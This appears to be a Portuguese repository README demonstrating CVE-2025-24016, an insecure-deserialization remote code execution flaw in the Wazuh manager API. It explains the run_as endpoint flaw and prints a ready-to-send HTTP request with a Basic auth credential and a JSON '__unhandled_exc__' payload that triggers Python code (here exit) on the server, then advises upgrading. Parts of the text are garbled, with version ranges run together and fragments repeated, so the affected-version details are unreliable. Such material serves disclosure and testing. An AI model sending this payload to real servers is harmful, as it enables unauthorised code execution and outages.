
CVE-2025-24016: RCE no servidor Wazuh! Execução Remota de Código
Este repositório demonstra a vulnerabilidade de execução remota de código (RCE) no servidor Wazuh, introduzida por uma desserialização insegura no pacote wazuh-manager. A vulnerabilidade permite que atacantes remotos com acesso à API (painel comprometido, servidores Wazuh no cluster ou determinadas configurações com agentes comprometidos) executem código arbitrário no servidor.
wazuh-manager versão >= 4.4.0>= 4.9.1A vulnerabilidade ocorre na API do Wazuh, onde os parâmetros do DistributedAPI são serializados como JSON e desserializados usando as_wazuh_object no arquivo framework/wazuh/core/cluster/common.py. Um atacante pode explorar essa vulnerabilidade injetando um dicionário não sanitizado em requisições DAPI, o que pode levar à avaliação de código Python arbitrário.
O RCE pode ser acionado usando o endpoint run_as, que permite ao atacante controlar o argumento auth_context. Ao criar uma requisição maliciosa, código arbitrário pode ser executado no servidor mestre.
Para acionar essa vulnerabilidade usando a API do servidor, siga os passos abaixo.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__, que aciona a execução de código Python arbitrário (exit neste caso).>= 4.4.0 até 4.9.0 (ainda não corrigida).exit é acionada, fazendo com que o servidor Wazuh seja encerrado.Para proteger seus sistemas, atualize para a versão >= 4.9.1 do Wazuh, onde este problema foi corrigido.